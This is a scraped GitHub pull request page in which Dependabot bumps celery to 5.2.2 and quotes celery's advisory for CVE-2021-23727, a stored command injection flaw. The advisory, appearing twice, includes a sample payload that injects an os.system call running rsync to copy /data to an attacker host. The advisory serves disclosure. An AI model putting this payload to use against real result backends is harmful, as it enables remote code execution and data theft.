René's URL Explorer Experiment


Title: Bump celery from 4.3.0 to 5.2.2 in /src by dependabot[bot] · Pull Request #20 · mitchtabian/CodingWithMitchBlog-REST-API · GitHub

Open Graph Title: Bump celery from 4.3.0 to 5.2.2 in /src by dependabot[bot] · Pull Request #20 · mitchtabian/CodingWithMitchBlog-REST-API

X Title: Bump celery from 4.3.0 to 5.2.2 in /src by dependabot[bot] · Pull Request #20 · mitchtabian/CodingWithMitchBlog-REST-API

Description: Bumps celery from 4.3.0 to 5.2.2. Release notes Sourced from celery's releases. 5.2.2 Release date: 2021-12-26 16:30 P.M UTC+2:00 Release by: Omer Katz Various documentation fixes. Fix CVE-2021-23727 (Stored Command Injection security vulnerability). When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data attacker@192.168.56.100:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data attacker@192.168.56.100:~/data as the exception arguments like so: { "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data attacker@192.168.56.100:~/data" } According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading. v5.2.1 Release date: 2021-11-16 8.55 P.M UTC+6:00 Release by: Asif Saif Uddin Fix rstrip usage on bytes instance in ProxyLogger. Pass logfile to ExecStop in celery.service example systemd file. fix: reduce latency of AsyncResult.get under gevent (#7052) Limit redis version: <4.0.0. Bump min kombu version to 5.2.2. Change pytz>dev to a PEP 440 compliant pytz>0.dev.0. ... (truncated) Changelog Sourced from celery's changelog. 5.2.2 :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz Various documentation fixes. Fix CVE-2021-23727 (Stored Command Injection security vulnerability). When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data attacker@192.168.56.100:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data attacker@192.168.56.100:~/data as the exception arguments like so: .. code-block:: python { "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data attacker@192.168.56.100:~/data" } According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading. .. _version-5.2.1: 5.2.1 :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin Fix rstrip usage on bytes instance in ProxyLogger. Pass logfile to ExecStop in celery.service example systemd file. fix: reduce latency of AsyncResult.get under gevent (#7052) Limit redis version: <4.0.0. Bump min kombu version to 5.2.2. ... (truncated) Commits b21c13d Bump version: 5.2.1 → 5.2.2 a60b486 Add changelog for 5.2.2. 3e5d630 Fix changelog formatting. 1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability). 2d8dbc2 Update configuration.rst 9596aba Fix typo in documentation 639ad83 update doc to reflect Celery 5.2.x (#7153) d32356c Bump version: 5.2.0 → 5.2.1 6842a78 Merge branch 'master' of https://github.com/celery/celery 4c92cb7 changelog for v5.2.1 Additional commits viewable in compare view Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase. Dependabot commands and options You can trigger Dependabot actions by commenting on this PR: @dependabot rebase will rebase this PR @dependabot recreate will recreate this PR, overwriting any edits that have been made to it @dependabot merge will merge this PR after your CI passes on it @dependabot squash and merge will squash and merge this PR after your CI passes on it @dependabot cancel merge will cancel a previously requested merge and block automerging @dependabot reopen will reopen this PR if it is closed @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) @dependabot use these labels will set the current labels as the default for future PRs for this repo and language @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language You can disable automated security fix PRs for this repo from the Security Alerts page.

Open Graph Description: Bumps celery from 4.3.0 to 5.2.2. Release notes Sourced from celery's releases. 5.2.2 Release date: 2021-12-26 16:30 P.M UTC+2:00 Release by: Omer Katz Various documentation fixes. Fix CV...

X Description: Bumps celery from 4.3.0 to 5.2.2. Release notes Sourced from celery&#39;s releases. 5.2.2 Release date: 2021-12-26 16:30 P.M UTC+2:00 Release by: Omer Katz Various documentation fixes. Fi...

Opengraph URL: https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20

X: @github

direct link

Domain: github.com

route-pattern/:user_id/:repository/pull/:id/files(.:format)
route-controllerpull_requests
route-actionfiles
fetch-noncev2:db1c444c-b33c-de96-bc0e-beff0da6ea9c
current-catalog-service-hashae870bc5e265a340912cde392f23dad3671a0a881730ffdadd82f2f57d81641b
request-idCED6:21BCA4:64AD60:8A501D:6A534AC7
html-safe-nonce275020cf4c5bbbbac215ec89ed886b349884dd77fcf55fd647ef531ea6e561e1
visitor-payloadeyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDRUQ2OjIxQkNBNDo2NEFENjA6OEE1MDFEOjZBNTM0QUM3IiwidmlzaXRvcl9pZCI6IjUwODcyOTU4OTM4MTgwMDIxMTkiLCJyZWdpb25fZWRnZSI6ImlhZCIsInJlZ2lvbl9yZW5kZXIiOiJpYWQifQ==
visitor-hmac64b20d767584694597ae1ece0bddfb36df1c855f047d1afebd8a8849ccbf6f00
hovercard-subject-tagpull_request:815899446
github-keyboard-shortcutsrepository,pull-request-list,pull-request-conversation,pull-request-files-changed,copilot
google-site-verificationApib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I
octolytics-urlhttps://collector.github.com/github/collect
analytics-location///pull_requests/show/files
fb:app_id1401488693436528
apple-itunes-appapp-id=1477376905, app-argument=https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
twitter:imagehttps://avatars.githubusercontent.com/in/29110?s=400&v=4
twitter:cardsummary_large_image
og:imagehttps://avatars.githubusercontent.com/in/29110?s=400&v=4
og:image:altBumps celery from 4.3.0 to 5.2.2. Release notes Sourced from celery's releases. 5.2.2 Release date: 2021-12-26 16:30 P.M UTC+2:00 Release by: Omer Katz Various documentation fixes. Fix CV...
og:site_nameGitHub
og:typeobject
hostnamegithub.com
expected-hostnamegithub.com
Noneb9a586c06a05a7a86fc7e3f4dbd03e42f6869085879aa184aa6369456dbd50fb
turbo-cache-controlno-preview
diff-viewunified
go-importgithub.com/mitchtabian/CodingWithMitchBlog-REST-API git https://github.com/mitchtabian/CodingWithMitchBlog-REST-API.git
octolytics-dimension-user_id17446480
octolytics-dimension-user_loginmitchtabian
octolytics-dimension-repository_id195463792
octolytics-dimension-repository_nwomitchtabian/CodingWithMitchBlog-REST-API
octolytics-dimension-repository_publictrue
octolytics-dimension-repository_is_forkfalse
octolytics-dimension-repository_network_root_id195463792
octolytics-dimension-repository_network_root_nwomitchtabian/CodingWithMitchBlog-REST-API
turbo-body-classeslogged-out env-production page-responsive
disable-turbotrue
browser-stats-urlhttps://api.github.com/_private/browser/stats
browser-errors-urlhttps://api.github.com/_private/browser/errors
release07a982c1d40157c619b364352b704c3ce66bb332
ui-targetfull
theme-color#1e2327
color-schemelight dark

Links:

Skip to contenthttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files#start-of-content
https://github.com/
Sign in https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fmitchtabian%2FCodingWithMitchBlog-REST-API%2Fpull%2F20%2Ffiles
GitHub CopilotWrite better code with AIhttps://github.com/features/copilot
GitHub Copilot appDirect agents from issue to mergehttps://github.com/features/ai/github-app
MCP RegistryNewIntegrate external toolshttps://github.com/mcp
ActionsAutomate any workflowhttps://github.com/features/actions
CodespacesInstant dev environmentshttps://github.com/features/codespaces
IssuesPlan and track workhttps://github.com/features/issues
Code ReviewManage code changeshttps://github.com/features/code-review
GitHub Advanced SecurityFind and fix vulnerabilitieshttps://github.com/security/advanced-security
Code securitySecure your code as you buildhttps://github.com/security/advanced-security/code-security
Secret protectionStop leaks before they starthttps://github.com/security/advanced-security/secret-protection
Why GitHubhttps://github.com/why-github
Documentationhttps://docs.github.com
Bloghttps://github.blog
Changeloghttps://github.blog/changelog
Marketplacehttps://github.com/marketplace
View all featureshttps://github.com/features
Enterpriseshttps://github.com/enterprise
Small and medium teamshttps://github.com/team
Startupshttps://github.com/enterprise/startups
Nonprofitshttps://github.com/solutions/industry/nonprofits
App Modernizationhttps://github.com/solutions/use-case/app-modernization
DevSecOpshttps://github.com/solutions/use-case/devsecops
DevOpshttps://github.com/solutions/use-case/devops
CI/CDhttps://github.com/solutions/use-case/ci-cd
View all use caseshttps://github.com/solutions/use-case
Healthcarehttps://github.com/solutions/industry/healthcare
Financial serviceshttps://github.com/solutions/industry/financial-services
Manufacturinghttps://github.com/solutions/industry/manufacturing
Governmenthttps://github.com/solutions/industry/government
View all industrieshttps://github.com/solutions/industry
View all solutionshttps://github.com/solutions
AIhttps://github.com/resources/articles?topic=ai
Software Developmenthttps://github.com/resources/articles?topic=software-development
DevOpshttps://github.com/resources/articles?topic=devops
Securityhttps://github.com/resources/articles?topic=security
View all topicshttps://github.com/resources/articles
Customer storieshttps://github.com/customer-stories
Events & webinarshttps://github.com/resources/events
Ebooks & reportshttps://github.com/resources/whitepapers
Business insightshttps://github.com/solutions/executive-insights
GitHub Skillshttps://skills.github.com
Documentationhttps://docs.github.com
Customer supporthttps://support.github.com
Community forumhttps://github.com/orgs/community/discussions
Trust centerhttps://github.com/trust-center
Partnershttps://github.com/partners
View all resourceshttps://github.com/resources
GitHub SponsorsFund open source developershttps://github.com/open-source/sponsors
Security Labhttps://securitylab.github.com
Maintainer Communityhttps://maintainers.github.com
Acceleratorhttps://github.com/open-source/accelerator
GitHub Starshttps://stars.github.com
Archive Programhttps://archiveprogram.github.com
Topicshttps://github.com/topics
Trendinghttps://github.com/trending
Collectionshttps://github.com/collections
Enterprise platformAI-powered developer platformhttps://github.com/enterprise
GitHub Advanced SecurityEnterprise-grade security featureshttps://github.com/security/advanced-security
Copilot for BusinessEnterprise-grade AI featureshttps://github.com/features/copilot/copilot-business
Premium SupportEnterprise-grade 24/7 supporthttps://github.com/enterprise/premium-support
Pricinghttps://github.com/pricing
Search syntax tipshttps://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
documentationhttps://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
Sign in https://github.com/login?return_to=https%3A%2F%2Fgithub.com%2Fmitchtabian%2FCodingWithMitchBlog-REST-API%2Fpull%2F20%2Ffiles
Sign up https://github.com/signup?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F%3Cuser-name%3E%2F%3Crepo-name%3E%2Fpull_requests%2Fshow%2Ffiles&source=header-repo&source_repo=mitchtabian%2FCodingWithMitchBlog-REST-API
Reloadhttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
Reloadhttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
Reloadhttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
mitchtabian https://github.com/mitchtabian
CodingWithMitchBlog-REST-APIhttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API
Notifications https://github.com/login?return_to=%2Fmitchtabian%2FCodingWithMitchBlog-REST-API
Fork 63 https://github.com/login?return_to=%2Fmitchtabian%2FCodingWithMitchBlog-REST-API
Star 125 https://github.com/login?return_to=%2Fmitchtabian%2FCodingWithMitchBlog-REST-API
Code https://github.com/mitchtabian/CodingWithMitchBlog-REST-API
Issues 1 https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/issues
Pull requests 11 https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pulls
Actions https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/actions
Projects https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/projects
Security and quality 0 https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/security
Insights https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pulse
Code https://github.com/mitchtabian/CodingWithMitchBlog-REST-API
Issues https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/issues
Pull requests https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pulls
Actions https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/actions
Projects https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/projects
Security and quality https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/security
Insights https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pulse
Sign up for GitHub https://github.com/signup?return_to=%2Fmitchtabian%2FCodingWithMitchBlog-REST-API%2Fissues%2Fnew%2Fchoose
terms of servicehttps://docs.github.com/terms
privacy statementhttps://docs.github.com/privacy
Sign inhttps://github.com/login?return_to=%2Fmitchtabian%2FCodingWithMitchBlog-REST-API%2Fissues%2Fnew%2Fchoose
dependabothttps://github.com/apps/dependabot
masterhttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/tree/master
dependabot/pip/src/celery-5.2.2https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/tree/dependabot/pip/src/celery-5.2.2
Conversation 0 https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20
Commits 1 https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/commits
Checks 0 https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/checks
Files changed https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
Please reload this pagehttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
Bump celery from 4.3.0 to 5.2.2 in /src https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files#top
Show all changes 1 commit https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
9c52ba1 Bump celery from 4.3.0 to 5.2.2 in /src dependabot[bot] Jan 6, 2022 https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/commits/9c52ba1f81833ec475c3a587393864abd66bac41
Clear filters https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
Please reload this pagehttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
Please reload this pagehttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files
src/requirements.txthttps://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files#diff-0a0827574cc2d3aac80f74096dd6d1e871b83efae03aa087c2c8e8f1e9187d26
View file https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/blob/9c52ba1f81833ec475c3a587393864abd66bac41/src/requirements.txt
Open in desktop https://desktop.github.com
https://github.co/hiddenchars
https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/{{ revealButtonHref }}
https://github.com/mitchtabian/CodingWithMitchBlog-REST-API/pull/20/files#diff-0a0827574cc2d3aac80f74096dd6d1e871b83efae03aa087c2c8e8f1e9187d26
https://github.com
Termshttps://docs.github.com/site-policy/github-terms/github-terms-of-service
Privacyhttps://docs.github.com/site-policy/privacy-policies/github-privacy-statement
Securityhttps://github.com/security
Statushttps://www.githubstatus.com/
Communityhttps://github.community/
Docshttps://docs.github.com/
Contacthttps://support.github.com?tags=dotcom-footer

Viewport: width=device-width


URLs of crawlers that visited me.